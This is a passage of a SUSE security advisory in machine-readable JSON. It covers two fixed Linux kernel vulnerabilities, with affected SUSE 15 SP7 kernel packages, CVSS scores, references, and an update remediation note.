[ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
